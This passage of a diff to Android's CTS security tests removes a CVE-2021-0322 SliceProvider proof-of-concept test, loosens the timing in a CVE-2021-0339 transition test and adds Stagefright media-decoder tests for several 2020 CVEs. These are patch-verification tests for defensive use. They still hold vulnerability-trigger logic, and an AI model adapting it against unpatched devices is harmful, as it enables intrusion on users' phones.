+                public void onError(int errorCode, String errorMessage) throws RemoteException {
+                    /**
+                     * GrantCredentialsPermissionActivity's onCreate() should not execute and
+                     * should return error when the requested UID does not match the process's UID
+                     */
+                    isVulnerable = false;
+                }
+            }));
+
+        intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_REQUESTING_UID,
+                        REQUESTED_UID);
+        mContext.startActivity(intent);
+        /**
+         * Sleep for 5 seconds to ensure that the AccountAuthenticatorResponse callback gets
+         * triggered if vulnerability is fixed.
+         */
+        try {
+            Thread.sleep(5000);
+        } catch (Exception e) {
+        }
+        assertFalse(isVulnerable);
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java b/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
deleted file mode 100644
index 2233005ed47..00000000000
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0322.java
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- *      http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package android.security.cts;
-
-import static org.junit.Assert.assertTrue;
-
-import android.app.PendingIntent;
-import android.content.Context;
-import android.content.Intent;
-import android.content.pm.ProviderInfo;
-import android.net.Uri;
-import android.os.Bundle;
-
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import android.platform.test.annotations.SecurityTest;
-
-@RunWith(AndroidJUnit4.class)
-public class CVE_2021_0322 {
-
-    private static final Uri BASE_URI = Uri.parse("content://android.security.cts.local/main");
-    private final Context mContext = InstrumentationRegistry.getContext();
-
-    boolean isVulnerable = false;
-    boolean onFinishedExecuted = false;
-
-    /**
-     * b/159145361
-     */
-    @SecurityTest(minPatchLevel = "2021-01")
-    @Test
-    public void testPocCVE_2021_0322() {
-        CVE_2021_0322_SliceProvider serviceProvider = new CVE_2021_0322_SliceProvider();
-        serviceProvider.attachInfo(mContext, new ProviderInfo());
-        PendingIntent pi = serviceProvider.onCreatePermissionRequest(BASE_URI);
-        PendingIntent.OnFinished onFinish = new PendingIntent.OnFinished() {
-            public void onSendFinished(PendingIntent pi, Intent intent,
-                    int resultCode, String resultData, Bundle resultExtras) {
-                String packageName = intent.getStringExtra("provider_pkg");
-                if(packageName != null) {
-                    isVulnerable = true;
-                }
-                onFinishedExecuted = true;
-            }
-        };
-        /* Execute the intent - the result is not required as the focus is    */
-        /* the intent which was used. Hence ignore the exceptions.            */
-        try {
-            pi.send(0, onFinish, null);
-        } catch (Exception e) {
-        }
-        /* Wait till the intent finishes. PendingIntent.OnFinished would be   */
-        /* exectuted and the details of the intent which was executed would   */
-        /* checked.                                                           */
-        try {
-            while(!onFinishedExecuted) {
-                Thread.sleep(1000); //Sleep for 1 second
-            }
-            assertTrue(!isVulnerable);
-        } catch (Exception e) {
-        }
-    }
-}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
index 66eadadaea7..5ace5df5f08 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java
@@ -16,7 +16,9 @@
 
 package android.security.cts;
 
-import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.assertThat;
+import static org.hamcrest.Matchers.lessThan;
+
 import android.test.AndroidTestCase;
 import android.app.Activity;
 import android.content.Context;
@@ -35,8 +37,8 @@ public class CVE_2021_0339 {
 
     static final String TAG = CVE_2021_0339.class.getSimpleName();
     private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
-    static final int MAX_TRANSITION_DURATION_MS = 3000;
-    static final int TIME_MEASUREMENT_DELAY_MS = 150;
+    static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max
+    static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag.
     public static boolean testCompleted;
 
     public FirstActivity fActivity;
@@ -69,11 +71,12 @@ public class CVE_2021_0339 {
         Log.d(TAG, "test completed");
 
         //A duration of a transition from "FirstActivity" to "Second Activity"
-        //is set in this test to 6000 ms
+        //is set in this test to 10 seconds
         // (res/anim/translate1.xml and res/anim/translate2.xml)
-        //The fix is supposed to limit the duration to 3000 ms
-        assertTrue(SecondActivity.duration < MAX_TRANSITION_DURATION_MS +
-          TIME_MEASUREMENT_DELAY_MS);
+        //The fix is supposed to limit the duration to 3000 ms.
+        // testing for > 8s
+        assertThat(SecondActivity.duration,
+            lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS));
     }
 
     public static class FirstActivity extends Activity {
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 69eb5f3b26d..949d4ced1fc 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1259,6 +1259,36 @@ public class StagefrightTest {
      ***********************************************************/
 
     @Test
+    @SecurityTest(minPatchLevel = "2020-12")
+    public void testStagefright_cve_2020_11139() throws Exception {
+        doStagefrightTest(R.raw.cve_2020_11139);
+    }
+
+    @Test
+    @SecurityTest(minPatchLevel = "2020-06")
+    public void testStagefright_cve_2020_3663() throws Exception {
+        doStagefrightTest(R.raw.cve_2020_3663);
+    }
+
+    @Test
+    @SecurityTest(minPatchLevel = "2020-08")
+    public void testStagefright_cve_2020_11122() throws Exception {
+        doStagefrightTest(R.raw.cve_2020_11122);
+    }
+
+    @Test
+    @SecurityTest(minPatchLevel = "2020-07")
+    public void testStagefright_cve_2020_3688() throws Exception {
+        doStagefrightTest(R.raw.cve_2020_3688);
+    }
+
+    @Test
+    @SecurityTest(minPatchLevel = "2020-11")
+    public void testStagefright_cve_2020_11168() throws Exception {
+        doStagefrightTest(R.raw.cve_2020_11168);
+    }
+
+    @Test
     @SecurityTest(minPatchLevel = "2020-06")
     public void testStagefright_cve_2020_3658() throws Exception {
         doStagefrightTest(R.raw.cve_2020_3658);